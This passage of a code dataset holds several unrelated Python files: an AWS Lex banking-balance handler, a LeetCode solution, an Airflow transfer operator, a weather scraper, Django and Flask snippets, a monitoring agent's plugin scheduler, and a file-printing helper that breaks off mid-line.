\r\n # Determine bill payment date overdue or not?\r\n \r\n if(cc1_days_left > 0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'And you have ' + str(cc1_days_left) + ' day left to settle the bills.'\r\n \r\n elif(cc1_days_left==0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + \"And, today is last day to pay bills!\"\r\n \r\n elif(cc1_days_left < 0):\r\n temp = cc1_days_left * -1\r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'You are ' + str(temp) + ' day behind credit bill payment!'\r\n \r\n else:\r\n message = \"Invalid!! \"\r\n \r\n return close(session_attributes, \"Fulfilled\", '{}'.format(message))\r\n \r\n elif (cust_acct_type in (\"signature\")):\r\n \r\n # Determine bill payment date overdue or not?\r\n \r\n if(cc2_days_left > 0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'And you have ' + str(cc2_days_left) + ' day left to settle the bills.'\r\n \r\n elif(cc2_days_left == 0):\r\n \r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + \"And, today is last day to pay bills!\"\r\n \r\n elif (cc2_days_left < 0):\r\n temp = cc2_days_left * -1 \r\n print(\"cred_2_due_date = \", cred_2_due_date, \" cc2_days_left= \", cc2_days_left, \" temp= \", temp)\r\n message = 'You have ' + str(acct_balance) + ' ringgit left on your ' + cust_acct_type + ' account.' + 'You are ' + str(temp) + ' day behind credit bill payment!'\r\n \r\n else:\r\n message = \"Invalid!! 
\"\r\n \r\n return close(session_attributes, \"Fulfilled\", '{}'.format(message))\r\n \r\ndef close(session_attributes, fulfillment_state, message):\r\n response = {\r\n 'sessionAttributes': session_attributes,\r\n \"dialogAction\": {\r\n \"type\": \"Close\",\r\n \"fulfillmentState\": \"Fulfilled\", \r\n \"message\": {\r\n \"contentType\": \"SSML\",\r\n \"content\": message\r\n }\r\n }\r\n }\r\n return response\r\n \r\ndef build_response_message(message_content):\r\n return {\"contentType\": \"PlainText\", \"content\": message_content}\r\n \r\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\r\n return {\r\n 'sessionAttributes': session_attributes,\r\n 'dialogAction': {\r\n 'type': 'ElicitSlot',\r\n 'intentName': intent_name,\r\n 'slots': slots,\r\n 'slotToElicit': slot_to_elicit,\r\n 'message': {\r\n \"contentType\": \"SSML\",\r\n \"content\": message\r\n }\r\n }\r\n }\r\n","sub_path":"scripts/fundamentals/aws_check_user_account_balance_in_awslex.py","file_name":"aws_check_user_account_balance_in_awslex.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131601166","text":"from __future__ import annotations\nfrom pprint import pprint\n\nclass Solution:\n def maximalRectangle(self, matrix: List[List[str]]) -> int:\n n = len(matrix)\n if n==0:\n return 0\n m = len(matrix[0])\n left = [0]*m\n right = [m]*m\n height = [0]*m\n ans = 0\n for i in range(n):\n for j in range(m):\n if matrix[i][j]=='1':\n height[j] = height[j]+1\n else:\n height[j] = 0\n \n cur_left = 0\n for j in range(m):\n if matrix[i][j]=='1':\n left[j] = max(left[j], cur_left)\n else:\n left[j] = 0\n cur_left = j+1\n \n cur_right = m\n for j in range(m-1,-1,-1):\n if matrix[i][j]=='1':\n right[j] = min(right[j], cur_right)\n else:\n right[j] = m\n cur_right = j\n \n for j in range(m):\n ans = max(ans, (right[j]-left[j])*height[j])\n\n pprint(left)\n pprint(right)\n pprint(height)\n print('\\n')\n \n return ans\n\n\ns = Solution()\nmat = [[\"0\",\"1\",\"1\",\"0\",\"1\"],[\"1\",\"1\",\"0\",\"1\",\"0\"],[\"0\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"1\",\"1\",\"0\"],[\"1\",\"1\",\"1\",\"1\",\"1\"],[\"0\",\"0\",\"0\",\"0\",\"0\"]]\npprint(mat)\ns.maximalRectangle(mat)","sub_path":"LeetCode/085. 
Maximal Rectangle/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167530705","text":"\"\"\"This file contains the formatter for mybabycart data sources\"\"\"\nimport re\nfrom cmu.transformers.generic import Transformer as BaseTransformer\nfrom django.utils.encoding import smart_unicode\n\nHEADER_MAP = {\n 'default': {\n 'wbn': ['^shipping_number$'],\n 'cl': ['^client$'],\n 'oid': ['^id_order$'],\n 'prd': ['^products$'],\n 'pin': ['^postcode$'],\n 'ctg': ['^goods description$'],\n 'cod': ['^cod value$'],\n }\n}\n\n\nclass Transformer(BaseTransformer):\n \"\"\"Transformer for mybabycart\"\"\"\n def __init__(self, **kwargs):\n super(Transformer, self).__init__(HEADER_MAP, **kwargs)\n","sub_path":"cmu/transformers/_mybabycart.py","file_name":"_mybabycart.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"394814493","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/operators/hive_to_mysql.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 4606 bytes\nfrom tempfile import NamedTemporaryFile\nfrom airflow.hooks.hive_hooks import HiveServer2Hook\nfrom airflow.hooks.mysql_hook import MySqlHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom airflow.utils.operator_helpers import context_to_airflow_vars\n\nclass HiveToMySqlTransfer(BaseOperator):\n \"\"\"HiveToMySqlTransfer\"\"\"\n template_fields = ('sql', 'mysql_table', 'mysql_preoperator', 'mysql_postoperator')\n template_ext = ('.sql', )\n ui_color = '#a0e08c'\n\n @apply_defaults\n def __init__(self, sql, mysql_table, hiveserver2_conn_id='hiveserver2_default', mysql_conn_id='mysql_default', mysql_preoperator=None, mysql_postoperator=None, bulk_load=False, *args, **kwargs):\n (super(HiveToMySqlTransfer, self).__init__)(*args, **kwargs)\n self.sql = sql\n self.mysql_table = mysql_table\n self.mysql_conn_id = mysql_conn_id\n self.mysql_preoperator = mysql_preoperator\n self.mysql_postoperator = mysql_postoperator\n self.hiveserver2_conn_id = hiveserver2_conn_id\n self.bulk_load = bulk_load\n\n def execute(self, context):\n hive = HiveServer2Hook(hiveserver2_conn_id=(self.hiveserver2_conn_id))\n self.log.info('Extracting data from Hive: %s', self.sql)\n if self.bulk_load:\n tmpfile = NamedTemporaryFile()\n hive.to_csv((self.sql), (tmpfile.name), delimiter='\\t', lineterminator='\\n',\n output_header=False,\n hive_conf=(context_to_airflow_vars(context)))\n else:\n results = hive.get_records(self.sql)\n mysql = MySqlHook(mysql_conn_id=(self.mysql_conn_id))\n if self.mysql_preoperator:\n self.log.info('Running MySQL preoperator')\n mysql.run(self.mysql_preoperator)\n self.log.info('Inserting rows into MySQL')\n if self.bulk_load:\n mysql.bulk_load(table=(self.mysql_table), tmp_file=(tmpfile.name))\n tmpfile.close()\n else:\n mysql.insert_rows(table=(self.mysql_table), rows=results)\n if self.mysql_postoperator:\n self.log.info('Running MySQL postoperator')\n mysql.run(self.mysql_postoperator)\n 
self.log.info('Done.')","sub_path":"pycfiles/apache_beam-2.20.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64/hive_to_mysql.cpython-36.py","file_name":"hive_to_mysql.cpython-36.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227904862","text":"import requests\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom .DayWeatherInfo import DayWeatherShortInfo, DayWeatherFullInfo\n\nfrom parsing.parsing_constants import WEATHER_PAGE\n\n\nclass WeatherParser:\n def __init__(self, city='чернигов', date=''):\n self.html_page = requests.get(WEATHER_PAGE + city.lower() + f'/{date}').text\n self.soup = BeautifulSoup(self.html_page, features=\"html.parser\")\n self.region = self.soup.find('div', class_='currentRegion').text\n\n\n def parse_block_of_weather(self, block):\n date = block.find('p', class_='date').text\n month = block.find('p', class_='month').text\n min_temperature = block.find('div', class_='min').text\n max_temperature = block.find('div', class_='max').text\n\n min_temperature = re.findall('[+-][0-9]+.', min_temperature)[0]\n max_temperature = re.findall('[+-][0-9]+.', max_temperature)[0]\n\n details = self.soup.find('div', {'class': 'wDescription clearfix'}).find('div', {'class': 'description'}).text\n\n return DayWeatherShortInfo(date, month, min_temperature, max_temperature, details)\n\n def parse_day_weather_shortly(self):\n today_block = self.soup.find('div', class_='main loaded')\n return self.parse_block_of_weather(today_block)\n\n def parse_day_weather_fully(self):\n\n data = self.parse_day_weather_shortly()\n\n detail_block = self.soup.find('div', class_='wMain clearfix')\n\n temperatures = [tag.text for tag in detail_block.find('tr', class_='temperature').find_all('td')]\n temperatures_sensation = [tag.text for tag in detail_block.find('tr', class_='temperatureSens').find_all('td')]\n pressure = [tag.text for tag in detail_block.find_all('tr')[5].find_all('td')]\n humidity = [tag.text for tag in detail_block.find_all('tr')[6].find_all('td')]\n\n return DayWeatherFullInfo(data.day, data.month, data.min_temperature, data.max_temperature,\n temperatures, temperatures_sensation, pressure, humidity, data.details)\n\n def parse_7_days_info(self):\n blocks_with_forecast = self.soup.find('div', class_='tabs').find_all('div', class_='main')\n week_data = list(map(self.parse_block_of_weather, blocks_with_forecast))\n\n return week_data\n\n\n\n\n\n","sub_path":"project/parsing/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"306255814","text":"from flask import render_template\n\nfrom app import app # import the app instance from the app package\n\n# two routes\n@app.route('/')\n@app.route('/index')\n# one view function\ndef index():\n\tuser = {'username': \"bobo\"}\n\t# build a list of posts: two dicts, each holding an author (a nested dict) and the post body.\n\tposts = [\n\t\t{\n\t\t\t'author': {'username': 'John'},\n\t\t\t'body': 'Beautiful day in Portland!'\n\t\t},\n\t{\n\t\t'author': {'username': 'Susan'},\n\t\t'body': 'The Avengers movie was so cool!'\n\t}\n\t]\n\treturn render_template('index.html', posts=posts, user=user)","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"589275385","text":"# Perform the logical bitwise operations AND, OR, 
etc.\n# on the numbers 5 and 6. Then perform a bitwise shift of the number 5 right and left by two positions.\na = 5\nb = 6\n\na_and_b = a & b\na_xor_b = a ^ b\na_or_b = a | b\n\na_mov_left = a << 2\na_mov_right = a >> 2\n\nprint('5 AND 6 = ', a_and_b,\n ',5 XOR 6 = ', a_xor_b,\n ',5 OR 6 = ', a_or_b,\n ',5 MOV left', a_mov_left,\n ', 5 MOV right', a_mov_right)\n","sub_path":"hw1/hw1-2.py","file_name":"hw1-2.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"560263495","text":"from members.models import ItemType\nfrom .models import LineItem, PosPayment\nimport django_filters\nfrom django_filters import DateFilter, ChoiceFilter, BooleanFilter\nfrom tempus_dominus.widgets import DatePicker\n\n\ndef item_type_choices():\n choices = []\n item_types = ItemType.objects.filter(pos=True)\n for it in item_types:\n choices.append([it.id, it.description])\n return choices\n\n\nclass LineItemFilter(django_filters.FilterSet):\n\n item_type_id = ChoiceFilter(\n field_name=\"item__item_type_id\",\n label=\"Item type\",\n choices=((1, \"dummy\"),),\n empty_label=\"All\",\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.base_filters[\"item_type_id\"].extra[\"choices\"] = item_type_choices()\n return\n\n class Meta:\n model = LineItem\n fields = [\"transaction__creation_date\"]\n\n\n# class LineItemTableFilter(django_filters.FilterSet):\n# date_from = DateFilter(field_name='transaction__creation_date',\n# lookup_expr='gte',\n# label='Date from',\n# widget=DatePicker(options={'format': 'DD/MM/YYYY'})\n# )\n# date_to = DateFilter(field_name='transaction__creation_date',\n# lookup_expr='lte',\n# label='Date to',\n# widget=DatePicker(options={'format': 'DD/MM/YYYY'})\n# )\n# item_type_id = ChoiceFilter(field_name='transaction__item_type_id',\n# label='Item type',\n# choices=item_type_choices(),\n# empty_label=\"All\"\n# )\n# billed = ChoiceFilter(field_name='transaction__billed',\n# label='Invoice',\n# choices=((0, 'Not yet invoiced'),(2, 'Invoiced')),\n# empty_label='No filter'\n# )\n\n\nclass PaymentFilter(django_filters.FilterSet):\n date_from = DateFilter(\n field_name=\"transaction__creation_date\",\n lookup_expr=\"gte\",\n label=\"Date from\",\n widget=DatePicker(options={\"format\": \"DD/MM/YYYY\"}),\n )\n date_to = DateFilter(\n field_name=\"transaction__creation_date\",\n lookup_expr=\"lte\",\n label=\"Date to\",\n widget=DatePicker(options={\"format\": \"DD/MM/YYYY\"}),\n )\n billed = ChoiceFilter(\n field_name=\"transaction__billed\",\n label=\"Invoice\",\n choices=((0, \"Not yet invoiced\"), (2, \"Invoiced\")),\n empty_label=\"No filter\",\n )\n","sub_path":"pos/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"522393715","text":"from django import forms\nfrom django.forms.formsets import BaseFormSet\n\n\nclass FieldForm(forms.Form):\n \"\"\"\n For each pair of fields\n \"\"\"\n field1 = forms.CharField(max_length=100, required=False)\n field2 = forms.CharField(max_length=100, required=False)\n\n\nclass ProfileForm(forms.Form):\n \"\"\"\n user profile\n \"\"\"\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user', None)\n super(ProfileForm, self).__init__(*args, **kwargs)\n\n self.fields['first_name'] = forms.CharField(max_length=30, initial=self.user.first_name,)\n self.fields['last_name'] = forms.CharField(max_length=30, 
initial=self.user.last_name,)\n # it is possible to put more fields...\n\n\nclass BaseFieldFormSet(BaseFormSet):\n def clean(self):\n \"\"\"\n Adds validation\n \"\"\"\n if any(self.errors):\n return\n\n field1s = []\n field2s = []\n duplicates = False\n\n for form in self.forms:\n if form.cleaned_data:\n field1 = form.cleaned_data['field1']\n field2 = form.cleaned_data['field2']\n\n if field1 and field2:\n if field1 in field1s:\n duplicates = True\n field1s.append(field1)\n\n if field2 in field2s:\n duplicates = True\n field2s.append(field2)\n\n if duplicates:\n raise forms.ValidationError('Each pair of fields must be unique.')\n\n if field1 and not field2:\n raise forms.ValidationError('All links must have field1.')\n elif field2 and not field1:\n raise forms.ValidationError('All links must have field2.')\n","sub_path":"formsets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"458558370","text":"import json, sys, logging, logging.handlers, time, pprint, itertools, traceback, collections\nfrom pathlib import Path\nimport ruxit.plugin_state_machine, ruxit.config_utils, ruxit.plugin_status_reporter\nimport ruxit.mem_tracking,ruxit.utils.fault_handling, ruxit.utils.perf_utils\nimport ruxit.utils.murmur3, ruxit.utils._logging\n\nfrom .utils.execute_every_minute import ExecuteEveryMinute\nfrom .package_utils import plugin_updater as plugin_update_mod\nfrom ruxit.plugin_status_reporter import PluginFullStatus, PluginState\nfrom ruxit.utils._logging import engine_logging\nfrom ruxit.utils.docker_helper import DockerUtils\n\n\nlogger = logging.getLogger(__name__)\n\ndef _do_nothing(self, *args, **kwargs):\n pass\n\n\nclass PluginTask:\n def __init__(self, engine, follow_up=None, timestamp=None):\n self.engine = engine\n self.follow_up = follow_up\n self.created_timestamp = timestamp\n if timestamp is None:\n self.created_timestamp = time.monotonic()\n if follow_up is None:\n self.follow_up = _do_nothing\n\n def __repr__(self):\n return \"PluginTask(engine=%s,follow_up=%s,created_timestamp=%s)\" % (\n self.engine,\n self.follow_up,\n self.created_timestamp\n )\n\n\nclass PluginLoop:\n SfmStat = collections.namedtuple('SfmStat', ['cpu_usage', 'mem_used', 'exec_time'])\n def __init__(self,\n concurrent_mod,\n stop_strategy,\n report_results_strategy,\n get_metadata_strategy,\n platform_api,\n num_python_threads):\n\n self.pending_disabled = []\n self.concurrent_mod = concurrent_mod\n self.executor = self.concurrent_mod.ThreadPoolExecutor(max_workers=num_python_threads)\n\n self.step_timeout = 2\n self.shutdown_timeout = 8\n\n self.plugin_engines = []\n self.incompatible_plugins = []\n self.pending_execution = []\n self.submitted_tasks = {}\n\n self.latest_plugin_infos = []\n\n self.report_results_strategy = report_results_strategy\n self.get_metadata_strategy = get_metadata_strategy\n self.stop_strategy = stop_strategy\n self.platform_api = platform_api\n\n self.status_every_minute = ExecuteEveryMinute()\n self.sfm_every_minute = ExecuteEveryMinute()\n self.zero_counter_every_minute = ExecuteEveryMinute()\n self.plugin_reporter = ruxit.plugin_status_reporter.PluginStatusReporter(self.platform_api.external_api)\n\n self.mem_driver = ruxit.mem_tracking.TracemallocDriver(external_api=self.platform_api.external_api)\n\n log_path = self.platform_api.external_api.get_log_path()\n install_path = self.platform_api.external_api.get_install_path()\n self.fault_handler_trap = 
ruxit.utils.fault_handling.FaultHandlerTrap(fault_info_dir=log_path)\n self.hung_plugin_reporter = ruxit.utils.fault_handling.HungPluginsReporter(fault_info_dir=log_path)\n self.plop_driver = ruxit.utils.perf_utils.PlopDriver(external_api=self.platform_api.external_api)\n ruxit.utils.murmur3.Murmur3().initialize(self.platform_api.external_api, platform_api.is_local)\n self.run_plugins = set()\n DockerUtils.base_path = Path(install_path)\n\n def main(self):\n self._update_logging_configuration()\n self._update_plugin_metadata()\n process_mem = self._create_processmem()\n\n while self.should_run():\n time_start = time.monotonic()\n\n if not self.platform_api.external_api.should_pause():\n process_mem()\n self.one_plugin_loop_step()\n self.plop_driver.step()\n\n work_time = time.monotonic() - time_start\n time_left = self.step_timeout - work_time\n if time_left > 0:\n time.sleep(time_left)\n\n self.status_every_minute.do(\n logger.info,\n \"Plugin loop status: time_taken: %s, engines_info: %s, \",\n work_time,\n pprint.pformat([\"%s, executions:%s \" % (pe, pe.get_execution_count()) for pe in self.plugin_engines]),\n )\n\n if not self.platform_api.is_local:\n self.sfm_every_minute.do(\n self.report_self_monitoring,\n self.platform_api,\n self.plugin_engines,\n )\n self.zero_counter_every_minute.do(\n self.zero_counter,\n self.plugin_engines,\n )\n\n self.shutdown()\n\n def zero_counter(self, endpoints):\n for endpoint in endpoints:\n endpoint.device_counter = 0\n endpoint.group_counter = 0\n\n\n def report_self_monitoring(self, platform_api, plugins):\n cpu = platform_api.external_api.get_cpu_usage()\n mem = platform_api.external_api.get_mem_usage()\n execTimeList = []\n for plugin in plugins:\n if len(plugin._stats) > 0:\n pluginName = plugin.plugin_info.name + \" \" + str(plugin.config_id)\n execTime = plugin._stats[-1].end_time - plugin._stats[-1].start_time\n logger.debug(\"SFM stat: Plugin: %s, exec time=%d\", pluginName, execTime)\n execTimeList.append((pluginName, execTime))\n\n stat = self.SfmStat(cpu_usage=cpu, mem_used=mem, exec_time=execTimeList)\n platform_api.external_api.report_self_monitoring(stat)\n\n def _create_processmem(self):\n mem_driver_interval = self.platform_api.external_api.get_int_debug_flag(\n \"debugPluginAgentTracemallocIntervalNative\",\n 180\n )\n process_mem = ruxit.mem_tracking.run_on_interval_decorator(\n lambda: self.mem_driver.process_memory_usage(),\n mem_driver_interval\n )\n return process_mem\n\n def one_plugin_loop_step(self):\n self._update_logging_configuration()\n if self.platform_api.data_update():\n self.trigger_plugins_life(self.latest_plugin_infos)\n self._update_plugin_log_level()\n self.trigger_state_machines()\n\n done_futures, not_done_futures = self.concurrent_mod.wait(self.submitted_tasks.keys(), timeout=self.step_timeout)\n for done_future in done_futures:\n plugin_task = self.submitted_tasks[done_future]\n plugin_engine = plugin_task.engine\n plugin_engine.execution_timeout = False\n del self.submitted_tasks[done_future]\n try:\n # in order to catch exceptions originating from plugins\n done_future.result()\n plugin_task.follow_up(plugin_engine)\n except Exception as ex:\n plugin_engine.get_logger().info(\"plugin %s threw exception %s\", plugin_engine, ex)\n\n if plugin_engine not in self.pending_disabled:\n self.pending_execution.append(plugin_engine)\n else:\n self.pending_disabled.remove(plugin_engine)\n\n self.hung_plugin_reporter.report_hung_tasks(self.submitted_tasks)\n\n self.gather_stats()\n\n self.report_plugins_status()\n\n 
return done_futures, not_done_futures\n\n def _report_plugin_results(self, plugin_engine):\n result = plugin_engine.flush_results()\n if result is None:\n plugin_engine.get_logger().warn(\"No results available from plugin_engine %s\" % plugin_engine)\n return\n if plugin_engine.get_logger().isEnabledFor(logging.DEBUG):\n plugin_engine.get_logger().info(\"Plugin finished engine=%s, result=%s\", plugin_engine, pprint.pformat(result))\n \n if not plugin_engine.is_fast_check:\n try:\n self.report_results_strategy(\n result.measurements,\n result.properties,\n result.events.events\n )\n except Exception as ex:\n plugin_engine.get_logger().info(\"Report results for plugin %s threw exception %s\", plugin_engine, ex)\n exception_info = sys.exc_info()\n plugin_engine.set_full_status(PluginState.ERROR_UNKNOWN, exception_info)\n\n self.platform_api.additional_report_step(plugin_engine)\n else:\n logging.info(\"Results are not reported - fast check.\")\n if not self.platform_api.is_local:\n plugin_engine.topology_builder._groups = {}\n plugin_engine.results_builder.reset_result()\n\n\n def _update_plugin_metadata(self):\n updated_metadata = self.get_metadata_strategy()\n if self.platform_api.external_api.resolve_conflicts_flag():\n logger.info('Installing plugins with conflict resolution')\n plugin_updater = plugin_update_mod.PluginUpdater(\n sys.path,\n updated_metadata\n )\n plugin_entries = plugin_updater.install_plugins()\n self.incompatible_plugins = plugin_updater.incompatible_plugins\n logger.info('========= INCOMPATIBLE PLUGINS =========')\n logger.info(pprint.pformat(self.incompatible_plugins))\n logger.info('='*40)\n logger.info('*'*40)\n logger.info(plugin_entries)\n logger.info('*'*40)\n self.latest_plugin_infos = plugin_entries\n sys.path.extend([entry.directory for entry in plugin_entries])\n logger.info(\"sys.path after installing plugins: %r\", sys.path)\n else:\n logger.info(\"Installing plugins using old mechanism (no conflict resolution)\")\n self.latest_plugin_infos = [\n plugin_update_mod.PluginInfo(json_data=json.loads(mt[1]), directory=mt[0]) for mt in updated_metadata\n ]\n for directory_metadata in updated_metadata:\n if directory_metadata[0] not in sys.path:\n sys.path.append(directory_metadata[0])\n logger.info('appending %s to sys.path', directory_metadata[0])\n if logger.isEnabledFor(logging.DEBUG):\n logger.debug(\"Latest plugin metadata: %s\", pprint.pformat(self.latest_plugin_infos))\n\n def trigger_plugins_life(self, plugin_metadata):\n to_activate, to_deactivate = self.platform_api.select_plugins(self.plugin_engines, plugin_metadata)\n plugins_changed = False\n for engine_activation_context, plugin_info in to_activate:\n try:\n plugins_changed = True\n\n engine = self.platform_api.create_engine(plugin_info, engine_activation_context)\n logger.info(\n \"Activating plugin engine: %s \\ninfo: %s\",\n engine,\n plugin_info\n )\n if engine.get_logger().isEnabledFor(logging.DEBUG):\n engine.get_logger().debug(\"Activated engine full metadata: %s\", pprint.pformat(plugin_info.json_data))\n self.pending_execution.append(engine)\n self.plugin_engines.append(engine)\n self.run_plugins.add(engine.metadata[\"name\"])\n except:\n logger.exception (\"Unable to create plugin %s because of %s\",\n 'plugin_info.json_data.metadata[\"source\"][\"className\"]',\n sys.exc_info())\n\n for inactive_engine in to_deactivate:\n plugins_changed = True\n inactive_engine.get_logger().info(\n \"Removing plugin engine: %s, activation_context: %s\",\n inactive_engine,\n 
inactive_engine.activation_context\n )\n self.plugin_engines.remove(inactive_engine)\n self.plugin_reporter.remove_engine(inactive_engine)\n if inactive_engine in self.pending_execution:\n self.pending_execution.remove(inactive_engine)\n else:\n self.pending_disabled.append(inactive_engine)\n\n if plugins_changed:\n logger.info(\"active plugins changed\")\n\n def trigger_state_machines(self):\n new_pending_execution = []\n for plugin_engine in self.pending_execution:\n future = None\n follow_up = None\n new_config, fast_check_id, enabled = self.platform_api.get_plugin_config(plugin_engine, self.latest_plugin_infos)\n\n if fast_check_id:\n plugin_engine.request_fast_check(fast_check_id)\n plugin_uninitialized = not plugin_engine.is_initialized()\n if enabled and plugin_engine.ready_for_set_config(new_config, fast_check_id):\n future = self.executor.submit(\n plugin_engine.event_set_configuration,\n new_config\n )\n follow_up = self._report_plugin_results\n elif new_config is not None and not enabled and plugin_engine.state != PluginState.DISABLED:\n future = self.executor.submit(plugin_engine.event_disable)\n elif new_config is None and not plugin_uninitialized:\n future = self.executor.submit(plugin_engine.event_uninitialize)\n elif plugin_engine.ready_for_measure():\n future = self.executor.submit(plugin_engine.event_gather_measurements)\n follow_up = self._report_plugin_results\n\n if future is not None:\n self.submitted_tasks[future] = PluginTask(plugin_engine, follow_up=follow_up)\n else:\n new_pending_execution.append(plugin_engine)\n\n self.pending_execution = new_pending_execution\n\n def shutdown(self):\n logger.info(\"Shutting down plugin loop\")\n not_cancelled = []\n cancelled = []\n\n # cancel plugins that can be cancelled\n for future in self.submitted_tasks:\n cancel_result = future.cancel()\n if not cancel_result:\n not_cancelled.append(future)\n else:\n cancelled.append(future)\n # wait for all executing plugins\n done, not_done = self.concurrent_mod.wait(not_cancelled, timeout=self.shutdown_timeout)\n\n # schedule closing of all plugins\n shutdown_tasks = []\n for future in itertools.chain(cancelled, done):\n plugin_engine = self.submitted_tasks[future].engine\n future = self.executor.submit(plugin_engine.shutdown)\n shutdown_tasks.append(future)\n # wait for them to shut down\n shut_down, not_shut_down = self.concurrent_mod.wait(shutdown_tasks, timeout=self.shutdown_timeout)\n\n self.executor.shutdown(wait=False)\n logger.info(\"Plugin loop shutdown finished\")\n\n def gather_stats(self):\n for engine in self.plugin_engines:\n if engine.get_logger().isEnabledFor(logging.DEBUG):\n engine.get_logger().debug('Plugin Stats for engine %s: \\n%s', engine, pprint.pformat(engine.get_stats()))\n\n def should_run(self):\n return next(self.stop_strategy) and self.platform_api.external_api.plugins_enabled()\n\n def report_plugins_status(self):\n not_existing_plugins = self.platform_api.get_not_existing_plugins(self.plugin_engines)\n self.plugin_reporter.report_status(\n engines = reversed(self.plugin_engines), \n incompatible_plugins = self.incompatible_plugins,\n not_existing_plugins = not_existing_plugins)\n\n def _update_logging_configuration(self):\n # we're setting this on root logger, so all other loggers are affected\n if self. 
platform_api.external_api.is_debug_logging_enabled() is True:\n logging.getLogger().setLevel(logging.DEBUG)\n else:\n logging.getLogger().setLevel(logging.INFO)\n\n\n def _update_plugin_log_level(self):\n for plugin_name in self.run_plugins:\n log_level = self.platform_api.external_api.get_str_debug_flag('debugRPACustomLogLevel.{}'.format(plugin_name), 'NONE')\n if log_level != 'NONE':\n engine_logging.set_log_level(plugin_name, log_level)\n\n\ndef dump_stack():\n code = []\n for threadId, stack in sys._current_frames().items():\n code.append(\"\\n# Thread: %d\" % (threadId))\n for filename, lineno, name, line in traceback.extract_stack(stack):\n code.append('File: \"%s\", line %d, in %s' % (filename, lineno, name))\n if line:\n code.append(\" %s\" % (line.strip()))\n logger.info(\"\\n\".join(code))\n return code\n\n\ndef main(stop_strategy, report_results_strategy, get_metadata_strategy, platform_api, num_python_threads):\n import concurrent.futures\n import concurrent.futures.thread\n import atexit\n atexit.unregister(concurrent.futures.thread._python_exit)\n loop = PluginLoop(\n stop_strategy=stop_strategy,\n concurrent_mod=concurrent.futures,\n report_results_strategy=report_results_strategy,\n get_metadata_strategy=get_metadata_strategy,\n platform_api=platform_api,\n num_python_threads=num_python_threads)\n loop.main()\n","sub_path":"venv/Lib/site-packages/ruxit/plugin_loop.py","file_name":"plugin_loop.py","file_ext":"py","file_size_in_byte":17067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496339433","text":"def get_dict(file):\r\n _dict = {}\r\n file = file.split('[')[0]\r\n try:\r\n file = open(file,\"rb\").readlines()\r\n except FileNotFoundError:\r\n #print('[!] Couldn\\'t open file \\'{}\\''.format(file))\r\n return False \r\n for line_number, line in enumerate(file):\r\n _dict[line_number] = line\r\n return _dict\r\n\r\n\r\ndef get_index(file):\r\n _dict = get_dict(file)\r\n if len(file.split('[')) == 1:\r\n index = len(_dict)\r\n return index\r\n elif len(file.split('[')) == 2:\r\n index = file.split('[')[-1][:-1]\r\n return int(index)\r\n\r\n\r\n\r\ndef cat(file):\r\n try:\r\n dex = get_index(file)\r\n except:\r\n print('[!] Couldn\\'t open file \\'{}\\''.format(file))\r\n return\r\n for x in range(13):\r\n if x < dex:\r\n try:\r\n print(get_dict(file)[x].decode('utf-8'))\r\n except UnicodeDecodeError:\r\n print(\"[!] 
